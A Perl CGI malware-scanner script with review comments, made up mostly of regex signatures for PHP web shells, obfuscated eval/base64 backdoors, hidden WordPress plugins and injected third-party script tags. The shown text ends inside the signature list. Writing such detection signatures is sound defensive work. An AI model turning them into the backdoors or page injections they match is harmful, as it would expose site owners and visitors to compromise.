LP-MSH-Scanner/malwaresh.pl
2020-01-27 16:16:19 +01:00


#!/usr/bin/perl
#
# Malware Cleaner Shell Version
#
#
use strict;
use warnings;
use CGI;
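BEGIN {
    # Installed at compile time so that a fatal error anywhere later in the
    # script produces a visible "error: ..." report on STDOUT before the
    # process dies.
    $SIG{__DIE__} = sub {
        my $msg = shift;

        # NOTE(review): the script prints its own Content-type header at
        # startup, so for a die raised after that point these two lines land
        # in the response body instead of being parsed as HTTP headers.
        print "status: 500\n";
        print "content-type: text/html\n\n";

        # Keep the report on a single line: every newline becomes a NUL byte.
        $msg =~ s/\n/\0/g;

        # The response is served as text/html and a die message can carry
        # file names or other externally influenced text, so the copy that is
        # shown to the client is HTML-escaped. The exception itself is
        # re-thrown unescaped below.
        my %entity_for = (
            '&' => '&amp;',
            '<' => '&lt;',
            '>' => '&gt;',
            '"' => '&quot;',
            "'" => '&#39;',
        );
        ( my $shown = $msg ) =~ s/([&<>"'])/$entity_for{$1}/g;
        print "error: $shown\n";

        # NOTE(review): die text normally ends with the script path and line
        # number, which this report discloses to the client. A __DIE__ hook
        # also fires for exceptions raised inside eval {}; if the rest of the
        # script uses eval for recoverable errors, consider starting this
        # handler with `die @_ if $^S;` - confirm against the callers.
        CORE::die $msg;
    };
}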
# Turn on autoflush for the currently selected output handle so that each
# print is sent immediately instead of sitting in a buffer.
$| = 1;

# Package-global CGI request object.
our $q = CGI->new();

# The response header is emitted once, up front, before any other output.
print "Content-type: text/html\n\n";

# First command-line argument (undef when none is given).
# NOTE(review): when a script runs under CGI, the web server may fill @ARGV
# from a query string that contains no "=" (the CGI "script command line"),
# so treat this value as untrusted. How $user is used is not visible from
# here - validate it before it reaches a path or a command.
my ($user) = @ARGV;
my @regexen = (
qr/<\?php\s+\/\*\*\s+\* WordPress DB Class.+?\$_REQUEST = array_merge\(\$_GET, \$_POST, \$_COOKIE\);\s+\$auth = \"([A-z0-9_]{1,40})\";\s+\$sname = \@session_name\(\);.+?\$method = \"create\" \. \"_\" \. \"function\";\s+\$decode = \"base\" \. \"64_de\" \. \"code\";\s+\$reverse = \"str\" \. \"rev\";\s+\$decompress = \"gzun\" \. \"compress\";.+?\$action = \$method\(\'\'\, \$data\);\s+\$action\(\);\s+\}\s+\}\s+\}/is,
qr/<\?php \/\*([A-z0-9_]{1,50})\*\/ \?><\?php \$([A-z0-9_]{1,20}) = \".+?\'\' \) , \$([A-z0-9_]{1,20}) \)\)\.\"\'.+?\'\"\.([A-z0-9_]{1,20})\( \$([A-z0-9_]{1,20})\[([A-z0-9_]{1,20})\],\$([A-z0-9_]{1,20})\[([A-z0-9_]{1,20})\]\.\$([A-z0-9_]{1,20})\[([A-z0-9_]{1,20})\], \$([A-z0-9_]{1,20})\[([A-z0-9_]{1,20})\] \);\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\,array\(\'\'\,\'\}\'\.\$([A-z0-9_]{1,20})\.\'\/\/\'\)\);/is,
qr/<script type=\'text\/javascript\' src=\'https:\/\/snippet\.adsformarket\.com\/.+?\.js\?.+?\'<\/script>/is,
qr/var gfjfgjk = 1; var d=document;var s=d\.createElement\(\'script\'\); s\.type=\'text\/javascript\'; s\.async=true;\s+var pl = String\.fromCharCode\(.+?if \(document\.currentScript\) \{\s+document\.currentScript\.parentNode\.insertBefore\(s\, document\.currentScript\);\s+\} else \{\s+d\.getElementsByTagName\(\'head\'\)\[0\]\.appendChild\(s\);\s+\}/is,
qr/<script type=\'text\/javascript\' src=\'https:\/\/snippet\.adsformarket\.com\/same\.js\'><\/script>/is,
qr/<script type=text\/javascript src=\'https:\/\/track\.adsformarket\.com\/t\.js\'><\/script>/is,
qr/<\?php if\(isset\(\$_POST\[chr\(97\)\.chr\(115\)\..+?\@include\(\$a\);\@unlink\(\$a\);die\(\); \} \?>/is,
qr/<\?php function ([A-z0-9_]{1,20})\(\$\w,\$\w,\$\w\)\{return \$\w\.\$\w\.\$\w;\} \$([A-z0-9_]{1,20}) =.+?\(\"at\",chr\(101\),\"\(\\x62a\"\);\$.+?\'\"\.\$([A-z0-9_]{1,20});\$([A-z0-9_]{1,20})\(\'\', \'\}\'\.\$([A-z0-9_]{1,20})\.\'\/\/\'\);/is,
qr/<\?php \$\{\"\\x47\\x4c\\x4fB\\x41\\x4c\\x53\"\}\[.+?eval\(\$([A-z0-9]{1,20})\[\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\[([0-9]{1,5})\]\]\);\s+\}\s+exit\(\);\s+\}\s+\}/is,
qr/<\?php\s+\/\/header\(.+?\\x30\"\]\(\);\?>/is,
qr/<\?php\s+\/\/header\(.+?\$([O0_]{1,6})=\(.+?\\x\d\d\"\]\(\);\?>/is,
qr/<\?php\s+\/\/header\(.+?\$([A-z0_]{1,20})=urldecode\(.+?\]\(\);\?>/is,
qr/<\?php\s+if \(isset\(\$\{\"_REQUE\"\.\"ST\"\}\[\'([A-z0-9_]{1,20})\'\]\)\)\{\$([A-z0-9_]{1,20})=\"assert\";\$([A-z0-9_]{1,20})\(\$\{\"_REQUEST\"\}\[\'([A-z0-9_]{1,20})\'\]\);exit;\} \/\/([A-z0-9_]{1,20})\s+if \(!extension_loaded\(\'IonCube_loader\'\)\).+?\?>\s+([A-z0-9_]{50,})\Z/is,
qr/<\?php\s+\$([A-z0_]{1,10})=.+?\$([A-z0_]{1,10})=\'\|hateyou\|\';.+?\$([A-z0_]{1,10})=urldecode\(\"\%.+?\$([A-z0_]{1,10})=\"([A-z0-9_]{20,})\";\?>/is,
qr/\/\/\s+([A-z0-9]{31})\s+echo\s+base64\_decode\(.+?\)\;\s+\/\/([A-z0-9]{31})/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\'\|.+?\)\)\=\=\$([A-z0-9]{1,20})\)eval\(\$.+?\'\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\'\|.+?\)die\;\$.+?\(false\,\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\)\).+?\'\;/is,
qr/<\?php.+?\$([A-z0-9]{1,20})\=\(([0-9]{1,5})\-([0-9]{1,5})\)\;\s+\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\-1\;\s+\?>/is,
qr/<\?php\s+\$\{\"\\x47\\x4c\\x4fB\\x41\\x4c\\x53\"\}.+?exit\(\)\;\s+\}\Z/is,
qr/<\?php\s+\/\/header\(\'Content\-Type\:text\/html\;.+?\=array\(.+?\=urldecode\(.+?\)\;exit\(\)\;\}\'\)\;\$\{\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"\}.+?\]\(\)\;\?>/is,
qr/<\?php.+?\$\{\"\\x47\\x4c\\x4fB\\x41\\x4c\\x53\"\}.+?\?>/is,
qr/<\?php\s+\$\{\"\\x.+?\$\{\"G\\x.+?\$\{\"\\x.+?\$\{\$\{\"G\\x.+?\}\;\}\s+\?>/is,
qr/<\?php\s+\/\*\s+Plugin\s+Name\:\s+antisp.+?add\_filter\(\'all\_plugins\'\,\s+\'ANTISP\_hide\'\)\;/is,
qr/<\?php.+?\;\$\{\"G.+?\;global\$mysqli\;global\$dbHost\;global\$dbUser\;\$.+?\;else\s+return\;break\;\}\}\s+\?>/is,
qr/<script>\s+var\s+\_0xa7af\=\[.+?\]\;eval\(function\(\_0xaddfx1\,\_0xaddfx2\,\_0xaddfx3\,\_0xaddfx4\,\_0xaddfx5\,\_0xaddfx6\)\{.+?\]\)\,0\,\{\}\)\)\s+<\/script>/is,
qr/<\?php\s+\/\*\s+Plugin\s+Name\:\s+spamdetectvr.+?add\_filter\(\'all\_plugins\'\,\s+\'SPAMDETECTVR\_hide\'\)\;.+?\/\/\s+\}\s+\/\/\}\)\;/is,
qr/<script\s+type\=\"text\/javascript\">\s+eval\(function\(p\,a\,c\,k\,e\,d\)\{e\=function\(c\)\{return\s+c\.toString\(.+?\.replace\(new\s+RegExp\(.+?script\|insertBefore\'\.split\(\'\|\'\)\,0\,\{\}\)\)\s+<\/script>/is,
qr/\/\/([A-z0-9]{32})\s+create\_function\(\'\'\,\s+gzuncompress\(base64_decode\(.+?\)\)\)\;\s+\/\/([A-z0-9]{32})/is,
qr/<\?php\s+\$\{.+?\;protected\$instance\;protected\$request\;protected\$calls\=array\(\)\;protected\$response\=array\(\)\;protected\$hasCalls\=false\;private\$isBatchCall\=false\;protected\$hiddenMethods\=array\(\'execute\'\,\'\_\_construct\'\).+?\}\s+\?>/is,
qr/<\?php\s+\$\{.+?\]\;\@mail\(.+?\]\}\)\;\$\_SESSION\[.+?\]\}\=curl\_init\(\)\;curl\_setopt\(\$\{\$\{.+?\]\}\,CURLOPT\_RETURNTRANSFER\,1\)\;curl\_setopt\(\$\{\$\{.+?\]\}\}\;\}\}\s+\?>/is,
qr/<\?php\s+\/\*\s+Plugin\s+Name\:\s+Pisher.+?trojan\.25hack.+?\;\}\)\;\}\)\;\s+\?>/is,
qr/\s+<\?php\s+echo\(base64\_decode\(.+?\)\)\;eval\(gzinflate\(base64\_decode\(.+?\)\)\)\;echo\s+\"\\x\d\d\\n\"\;\s+\?>/is,
qr/<\?php\s+echo\s+\"<div\s+align\=\\\"center\\\">.+?if\(isset\(\$\_POST\[\"submit\"\]\)\)\{if\(\$\_FILES\[\"file\"\]\[\"error\"\]>0\)\{echo.+?Go\s+here\s+\:\s+\"\.\$path\.\"<br>\"\;\}\}\s+\?>/is,
qr/<\?php\s+session\_start\(\)\;.+?function\s+login\_shell\(\)\s+\{\s+?>.+?IndoXploit.+?serverinfo\(\)\;\s+action\(\)\;\s+\?>\s+<\/body>\s+<\/html>/is,
qr/<\?.+?Aldwiry\s+Hack3r.+?\$usrp\s+\=\s+\"jo\/usr\.pl\"\;.+?Error\s+CHMOD\s+\!\"\;\s+\}\s+\?>/is,
qr/<\/br>\"\;\s+session\_start\(\)\;.+?Moshkela\s+Hacker<\/title>.+?\}\/\/\s+end\s+if\s+\}\s+\?>/is,
qr/<\?php\s+\$GLOBALS\[\'DB\_NAME\'\]\s+\=\s+array\(.+?if\(\!function\_exists\(\'bas\'\.\'e\'\.\'64\_\'\.\'en\'\.\'code\'\)\)\{.+?ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789.+?\)\;\?>/is,
qr/<\?php\s+\/\*\*\s+\*\s+SAPE\.ru.+?class\s+SAPE\_globals\s+\{.+?\$this\->\_data\[\$this\->\_request\_mode\]\s+\=\s+\$data\;\s+\}\s+\}/is,
qr/<\?php\s+if\s+\(\!defined\(\'\_SAPE\_USER\'\)\)\{\s+define\(\'\_SAPE\_USER\'\,.+?echo\s+\$sape\->return\_links\(\)\;\s+\?>/is,
qr/<\?\s+eval\(gzinflate\(base64\_decode\(.+?\)\)\)\s+\?>/is,
qr/<\?php\s+error\_reporting\(0\)\;.+?\$domain\s+\=\s+\'([A-z0-9]{1,20})\.liveupdates\.host\'\;.+?dns\_get\_record\(\$domain\,\s+DNS\_TXT\)\;.+?else\s+header\(\'Location\:\s+\'\.\$location\.\'\&\'\.\$\w\,\s+TRUE\,\s+302\)\;\s+\}/is,
qr/<\?php\s+\@date\_default\_timezone\_set\(.+?GetPageContent\(.+?EXPLOITOK.+?return\s+\(SASL\_CONTINUE\)\;\s+\}\s+\}/is,
qr/<\?php\s+function\s+cURLRequest\(\$url.+?function\s+Display404Page\(\)\s+\{.+?Display404Page\(\)\;\s+\}\s+exit\;\s+\}/is,
qr/<\?php\s+\$o0o\=\_\_FILE\_\_\;\$oOo\=\'.+?\'\;eval\(gzinflate\(base64\_decode\(.+?\'\)\)\)\;\?>/is,
qr/<\?php\s+\$o0O0\s+=.+?\$oO0\=\"cr\"\.\"eat\"\.\"e\_fun\"\.\"cti\"\.\"on\"\;\$oO0o\=\@\$oO0\(.+?\?>\"\.gz\'\.\'inf\'\.\'late\'\.\'\(\s+bas\'\.\'e64\'\.\'\_de\'\.\'co\'\.\'de\(.+?\,\$o0O0\)\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+true\;\$([A-z0-9]{1,20})\s+\=\s+true\;\$([A-z0-9]{1,20})\s+\=\s+true\;\$([A-z0-9]{1,20})\s+\=\s+\"([A-z0-9]{20,})\"\;.+?\$([A-z0-9]{1,20})\s+\=\s+\"([A-z0-9]{20,})\"\;\$([A-z0-9]{1,20})\s+\=\s+true\;\$.+?\;\$([A-z0-9]{1,20})\s+\=\s+\"\"\;\s+\?>/is,
qr/<\?php\s+\$\w\_\_\_\w\=\'base\'\.\(128\/2\)\.\'\_de\'\.\'code\'\;\$\w\_\_\_\w\=\$\w\_\_\_\w\(str\_replace\(\"\\n\"\,\ \'\'\,.+?<input\s+type\=\"submit\"value\=\"\&gt\;\"\/><\/form>/is,
qr/<\?php\s+set\_time\_limit\(0\)\;.+?Mister\s+Spy<\/title>.+?Upload\s+File.+?\?>\s+bypass.+?contact\@elmoujehidin\.net/is,
qr/<\?php\s+\@\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\;\s+\?>/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\"([A-z0-9]{1,20})\"\]\)\)\s+\{\$([A-z0-9]{1,20})\=\"ass\"\.\"ert\"\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\$\_REQUEST\[\"([A-z0-9]{1,20})\"\]\)\;\}\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\"ass\"\.\"ert\"\;\s+\$([A-z0-9]{1,20})\(\$\{\"\_PO\"\.\"ST\"\}\s+\[\"([A-z0-9]{1,20})\"\]\)\;\?>/is,
qr/<\?php\s+\$([A-z0-9]{20,})\=.+?eval\(base64\_decode\(gzuncompress\(base64\_decode\(\$([A-z0-9]{20,})\)\)\)\)\;\s+\?>/is,
qr/<\!DOCTYPE.+?libraries\/joomla\/document\/json\/a\.txt\s+was\s+not\s+found.+?<\/html>/is,
qr/<\?php\s+session\_start\(\)\;.+?\$auth\_pass.+?IndoXploit.+?IndoXploit<\/font><\/a><\/center>\"\;\s+\}\s+\?>\s+<\/html>/is,
qr/<\?php.+?FOPO.+?\$([A-z0-9]{1,20})\=.+?\@eval\(\$([A-z0-9]{1,20})\(\s+\"([A-z0-9]{50,}).+?\"\)\)\;\s+\?>/is,
qr/<SCRIPT\s+SRC\=http\:\/\/w0rms\.com\/sayac\.js><\/SCRIPT>\s+<\?php.+?header\(\'HTTP\/1\.0\s+404\s+Not\s+Found\'\)\;\s+exit\;/is,
qr/<\?php\s+if\s+\(isset\s+\(\$\_GET\[\'.+?\'\]\)\).+?\$default\_use\_ajax\s+\=\s+true\;.+?preg\_replace\(\"\/\.\*\/e\"\,\".+?\"\,\"\.\"\)\;\s+\}\s+else\s+\{\s+echo\s+\"<div\s+style\=display\:none>.+?<\/div>\"\;\s+\}\s+\?>/is,
qr/<\?php\s+WSOCheckUA\(\)\;.+?\$disable\_functions\s+\=\s+\@ini\_get\(.+?if\(\s+\!empty\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\s+\&\&\s+function\_exists\(\'action\'\s+\.\s+\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\s+\)\s+\{\s+call\_user\_func\(\'action\'\s+\.\s+\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\;\s+\}/is,
qr/<\?php.+?Bypass\s+\.\/Config\s+\.\/User\s+\.\/Domain.+?eval\(gzinflate\(base64\_decode\(.+?\)\)\)\;\s+\?>/is,
qr/<\?php\s+function\s+wsoHeader\(\)\s+\{.+?\$drives\s+\=\s+\"\"\;.+?<div\s+style\=\"margin\:5\">\'\;\s+\}/is,
qr/<\?php\s+function\s+getBot\(\$url\)\s+.+?echo\s+\"<b>Namesis<br>.+?exit\(\)\;\s+\}\s+\?>/is,
qr/<\?php\s+\$\_F\=\_\_FILE\_\_\;\$\_X\=.+?eval\(base64\_decode\(.+?\)\)\;\?>/is,
qr/<\?php\s+error\_reporting\(0\)\;.+?File\s+Manager<\/title>.+?\$pathen\s+\=\s+base64\_encode\(\$path\)\;.+?return\s+\$info\;\s+\}\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\_\w\s+\=\s+\'\'\.chr\(([0-9]{1,5})\)\.\'\'\.chr\(([0-9]{1,5})\)\.\'([A-z0-9]{1,20})\'\.chr\(([0-9]{1,5})\)\.\'de\'\s+\;\$([A-z0-9]{1,20})\s+\=\s+\$([A-z0-9]{1,20})\_\w\(\'\'\,array\(.+?\)\)\;\$([A-z0-9]{1,20})\(\)\;\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\)\;\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+array\(.+?array\(\'ba\'\s+\,\'se\'\s+\,\'64\'\s+\,\'\_d\'\s+\,\'ec\'\s+\,\'od\'\s+\,\'e\'\)\;.+?array\(\'gzu\'\,\s+\'nco\'\,\s+\'mpr\'\,\s+\'ess\'\).+?eval.+?\)\s+\)\s+\)\s+\)\s+\;\s+\?>/is,
qr/<\?php.+?\'\'\.chr\(.+?\'\.chr\(.+?\(\'\'\,array\(.+?\)\.\'e64\_deco\'\.chr\(.+?\(\)\;\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\)\;\?>/is,
qr/<\?php\s+header\(\'Content\-Type\:text\/.+?define\(\'SHELL\_PASSWORD\'\,.+?API\_VERSION\,\s+2\)\)\)\;\s+\}\s+\?>/is,
qr/<\?php\s+\/\*a\,b\,c\,d\,e\,f\,g\,h\,i\,j\,k\,l\,m\,n\,o\,p\,q\,r\,s\,t.+?\*\/\s+\?>/is,
qr/<\?php.+?\'\.chr\(.+?\)\.\'\'\.chr\(.+?aWYo.+?\(\)\;\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$.+?\)\)\;\?>/is,
qr/<\?php\s+define\(\'EXT\_MYSQLI\'\,\s+\'mysqli\'\)\;.+?\{\s+if\s+\(file\_exists\(sprintf\(\'\%s\/wp\-config\.php\'.+?\s+break\;\s+\}\s+\}\s+else\s+\{\s+die\(\'ympf\'\)\;\s+\}/is,
qr/<\?php\s+\$.+?\=\s+array\(.+?\=\s+array\(\'bas\'\s+\,\'e64\'\s+\,\'\_de\'\s+\,\'cod\'\s+\,\'e\'\)\;\s+\$.+?\=\s+array\('g\'\,\s+\'z\'\,\s+\'u\'\,\s+\'n\'\,\s+\'c\'\,\s+\'o\'\,\s+\'m\'\,\s+\'p\'\,\s+\'r\'\,\s+\'e\'\,\s+\'s\'\,\s+\'s\'\)\s+\;\$.+?\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=.+?\)\.\'\'\.chr\(.+?\'\;\$([A-z0-9]{1,20})\s+\=\s+array\(.+?eval.+?\)\)\)\)\;\s+\?>/is,
qr/<\?php\s+assert\_options\(ASSERT\_WARNING\,0\)\;.+?function\s+hex2ascii\(\$.+?\'e\'\.\'\'\.\'\'\.\'\'\.\'\'\.\'.+?\.\'\'\.\'\'\.\'\'\.\'v\'\.\'a\'\.\'l\'\.\'\(\$.+?assert\(\$\w\)\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+\'gzun\'\.\s+\'comp\'\.\s+\'ress\'\;\$([A-z0-9]{1,20})\s+\=\s+\'bas\'\s+\.\'e64\'\s+\.\'\_de\'\s+\.\'cod\'\s+\.\'e\'\;\$([A-z0-9]{1,20})\s+\=\s+\'imp\'\s+\.\'lod\'\s+\.\'e\'\;\$([A-z0-9]{1,20})\s+\=\s+array\(.+?eval.+?\)\)\)\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+\'g\'\.\s+\'z\'\.\s+\'u\'\.\s+\'n\'\.\s+\'c\'.\s+\'o\'\.\s+\'m\'\.\s+\'p\'\.\s+\'r\'\.\s+\'e\'\.\s+\'s\'\.\s+\'s\'\;\$([A-z0-9]{1,20})\s+\=\s+\'b\'\s+\.\'a\'\s+\.\'s\'\s+\.\'e\'\s+\.\'6\'\s+\.\'4\'\s+\.\'\_\'\s+\.\'d\'\s+\.\'e\'\s+\.\'c\'\s+\.\'o\'\s+\.\'d\'\s+\.\'e\'\;\$.+?=\s+\'imp\'\s+\.\'lod\'\s+\.\'e\'\;\$([A-z0-9]{1,20})\s+\=\s+array\(.+?eval\(.+?\)\)\)\)\;\s+\?>/is,
qr/<\?php\s+\@session\_start\(\)\;.+?if\(\$chk\_login\).+?echo\s+\$buff\;\s+\}\s+\?>\s+<\/div>\s+<\/body>\s+<\/html>/is,
qr/GIF89a\?<\?php.+?\$get\.\=chr\(.+?\$undecode\=.+?\$ecode\.\=\s+\$\_REQUEST\[.+?\@eval\(\$undecode\(\$.+?\?>/is,
qr/<title>MCL<\/title><form\s+enctype\=multipart\/form\-data\s+method\=post>.+?<\?\s+echo\s+base64\_decode\(.+?\$fp\=fopen\(base64\_decode\(\$\_REQUEST\[.+?\@copy\(\$\_FILES\[.+?\}\}\;\s+\?>/is,
qr/<\?php\s+\$a\=\"4\"\;\s+\$b\=\"0\"\;\s+\$c\=\"4\"\;\s+echo\s+\$a\.\$b\.\$c\.\"\#\"\;\s+\?>\s+<\?php\s+eval\(\$\_POST\[([A-z0-9]{1,20})\]\)\;\s+\$\w\_File\=fopen\(\$\_SERVER\[\'DOCUMENT\_ROOT\'\]\.\"\/1\.txt\"\,\"w\"\)\;\s+if\(\!\$\w\_File\)\s+echo\s+\"writewrong\"\;\s+else\s+echo\s+\"writeok\"\;\s+\?>/is,
qr/GIF89a\s+<\%\s+eval\s+request\(\"([A-z0-9]{1,20})\"\)\%>\s+abcabcabc/is,
qr/GIF89a<\?php\s+\@eval\(\$\_POST\[.+?\$response\s+\=\s+curl\(\$shell\_url\)\;.+?function\s+getcontent\(\$file\)\{.+?return\s+\$tmp\_content\;\s+\}/is,
qr/GIF89a.+?<\?php\s+eval\(\$\_POST\[([A-z0-9]{1,20})\]\)\?>/is,
qr/GIF89a<\?PHP\s+fputs\(fopen\(\'([A-z0-9]{1,20})\.php\'\,\'w\'\)\,\'<\?php\s+eval\(\$\_POST\[([A-z0-9]{1,20})\]\)\?>abcabcabc\'\)\;\?>/is,
qr/<\?php\s+echo\s+\'<form\s+action\=\"\".+?\$\_POST\[\'\_\'\]\=\=\"GO\"\)\{if\(\@copy\(\$\_FILES\[.+?Err<\/b>\'\;\}\}\?>/is,
qr/GIF89a\?\s+<\?php.+?\$get\.\=chr\(.+?\$undecode\=.+?\$ecode\.\=\s+\$\_REQUEST\[.+?\@eval\(\$undecode\(\$.+?\?>/is,
qr/\%PDF\-\d\.\d.+?<\?php\s+\@include.+?<title>\'\.getenv\(\"HTTP\_HOST\"\)\.\'\s+\~\s+chmod\.php<\/title>.+?print\s+\$footer\;.+?exit\(\)\;\s+\?>/is,
qr/<\?php\s+\/\/header\(.+?\=urldecode\(.+?\\x\d\d\"\]\(\)\;\?>/is,
qr/<\?\s+eval\(base64\_decode\(.+?\)\)\;\s+\?>/is,
qr/<\?php\s+\$\{\"\\x.+?\;\$\{.+?\;\$\{.+?\;\$\{.+?\;\$\{.+?\;\$\{.+?base64\_decode\(substr\(\$\{\$\{.+?\}\;\}exit\(\)\;\}break\;\}\}\}\}\}\s+\?>/is,
qr/<\?php\s+\$.+?\=\s+\'gzu\'\.\s+\'nco\'\.\s+\'mpr\'\.\s+\'ess\'\;\$.+?\=\s+\'bas\'\s+\.\'e64\'\s+\.\'\_de\'\s+\.\'cod\'\s+\.\'e\'\;\$.+?\=\s+\'imp\'\s+\.\'lod\'\s+\.\'e\'\;\$.+?array\(.+?eval\(.+?\)\)\)\)\;\s+\?>/is,
qr/<\?php\s+\$.+?\=\s+\'gz\'\.\s+\'un\'\.\s+\'co\'\.\s+\'mp\'\.\s+\'re\'\.\s+\'ss\'\;\$.+?\=\s+\'ba\'\s+\.\'se\'\s+\.\'64\'\s+\.\'\_d\'\s+\.\'ec\'\s+\.\'od\'\s+\.\'e\'\;\$.+?\=\s+\'im\'\s+\.\'pl\'\s+\.\'od\'\s+\.\'e\'\;\$.+?array\(.+?eval\(.+?\)\)\)\)\;\s+\?>/is,
qr/<\?php\s+\$s\_pass\s+\=.+?\$s\_func\=\"cr\"\.\"eat\"\.\"e\_fun\"\.\"cti\"\.\"on\"\;\$b374k\=\@\$s\_func\(\'\$x\,\$y\'\,\'ev\'\.\'al\'\.\'\(\"\\\$\s\_pass\=\\\"\$y\\\"\;\?>\"\.gz\'\.\'inf\'\.\'late\'\.\'\(\s+bas\'\.\'e64\'\.\'\_de\'\.\'co\'\.\'de\(\$x\)\)\)\;\'\)\;\@\$b374k\(.+?\$s\_pass\)\;\?>/is,
qr/\?php\s+if\(\s+isset\(\$\_REQUEST\[\"test\_url\"\]\)\s+\)\{\s+echo\s+\"file\s+test\s+okay\"\;.+?\$data\s+\=\s+base64\_decode\(.+?file\_put\_contents\(\"tivuser\.zip\"\,\$data\)\;.+?die\(\"([0-9]{1,20})\"\)\;\s+\}/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+true\;\$([A-z0-9]{1,20})\s+\=\s+true\;\$([A-z0-9]{1,20})\s+\=\s+true\;\$([A-z0-9]{1,20})\s+\=.+?array\(.+?\$([A-z0-9]{1,20})\s+=\s+true\;\$([A-z0-9]{1,20})\s+\=\s+([A-z0-9]{1,20})\;\$([A-z0-9]{1,20})\s+\=\s+false\;\$([A-z0-9]{1,20})\s+\=\s+\"\"\;\$([A-z0-9]{1,20})\s+\=\s+true\;\$([A-z0-9]{1,20})\s+\=\s+true\;\$.+?\$([A-z0-9]{1,20})\s+\=\s+\"\"\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+array\(.+?\=\s+array\(\'ba\'\s+\,\'se\'\s+\,\'64\'\s+\,\'\_d\'\s+\,\'ec\'\s+\,\'od\'\s+\,\'e\'\)\;\s+\$.+?\=\s+array\(\'gzu\'\,\s+\'nco\'\,\s+\'mpr\'\,\s+\'ess\'\)\s+\;\$.+?eval\s+\(\s+\$.+?\)\s+\)\s+\)\s+\)\s+\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+array\(.+?\=\s+array\(\'b\'\s+\,\'a\'\s+\,\'s\'\s+\,\'e\'\s+\,\'6\'\s+\,\'4\'\s+\,\'\_\'\s+\,\'d\'\s+\,\'e\'\s+\,\'c\'\s+\,\'o\'\s+\,\'d\'\s+\,\'e\'\)\;\s+\$.+?\=\s+array\(\'gz\'\,\s+\'un\'\,\s+\'co\'\,\s+\'mp\'\,\s+\'re\'\,\s+\'ss\'\)\s+\;\$.+?eval\s+\(\s+\$.+?\)\s+\)\s+\)\s+\)\s+\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+\'s\'\.\'t\'\.\'r\'\.\'r\'\.\'e\'\.\'v\'\;\$.+?\=\s+array\(.+?\'esab\'\)\;\$.+?\(\'edo\'\.\'lpm\'\.\'i\'\)\;\$.+?\)\.\'\'\)\;eval\(\$.+?\)\)\)\)\;\s+\?>/is,
qr/\$z\=get\_option\(\"([A-z0-9]{20,})\"\)\;\s+\$z\=base64\_decode\(str\_rot13\(\$z\)\)\;\s+if\(strpos\(\$z\,\"([A-z0-9]{1,20})\"\)\!\=\=false\)\{\s+\$\_z\=create\_function\(\"\"\,\$z\)\;\s+\@\$\_z\(\)\;\s+\}/is,
qr/function\s+add\_js\_scripts\(\)\s+\{\s+wp\_enqueue\_script\(\'js\-rws\'\,\s+\'http\:\/\/cloudflare\.solutions.+?wp\_enqueue\_script\(\'js\-cors\'\,\s+\'http\:\/\/cloudflare\.solutions\/ajax\/libs\/cors\/cors\.js\'\,\s+\'\'\,\s+null\,\s+true\)\;\s+\}.+?add\_action\(\'login\_enqueue\_scripts\'\,\s+\'add\_js\_scripts\'\s+\)\;/is,
qr/<html><head><meta.+?Mocus7Shell.+?<\?php\s+echo\s+wordwrap\(php\_uname\(\).+?<\/body><\/html><\?php\s+chdir\(\$lastdir\)\;\s+c79shexit\(\)\;\s+\}\s+\?>/is,
qr/<\?php\s+session\_start\(\)\;.+?\@clearstatcache\(\)\;.+?\$auth\_pass\s+\=.+?eval\(base64\_decode\(gzinflate\(str\_rot13\(convert\_uudecode\(gzinflate\(base64\_decode\(\(\$([A-z0-9]{1,20})\)\)\)\)\)\)\)\)\;/is,
qr/<\!doctype.+?L0LZ666H05T.+?<\/body>\s+<html>/is,
qr/<html>\s+<head>.+?213\_90N6.+?<\/body>\s+<\/html>/is,
qr/<iframe\s+width\=0px\s+height\=0px\s+frameborder\=no\s+name\=frame1\s+src\=http\:\/\/.+?\.ru>\s+<\/iframe>/is,
qr/<\?php\s+\$\{.+?\"\;eval\(base64\_decode\(\$\{\$\{\"G\\x.+?\"\;eval\(base64\_decode\(\$\{\$.+?\}\,CURLOPT\_CONNECTTIMEOUT\,10\)\;curl\_setopt\(\$\{\$\{.+?>\"\;\s+\?>/is,
qr/<\?php.+?x48x\s+Mini\s+Shell\s+Backdoor.+?\@clearstatcache\(\)\;.+?function\s+login\_shell\(\)\s+\{\s+\?>/is,
qr/<\?php\s+\/\*\s+MMM\s+\*\/\$OOO000000\=urldecode\(.+?\}\;\$GLOBALS\[.+?\=\_\_FILE\_\_\;\$.+?\)\)\;return\;\?.+?\=([A-z0-9]{1,20})/is,
qr/<\?php\s+set\_time\_limit\(0\)\;.+?eval\(base64\_decode\(file\_get\_contents\(\'https\:\/\/pastebin\.com\/raw\/.+?return\s+\$info\;\s+\}\s+\?>/is,
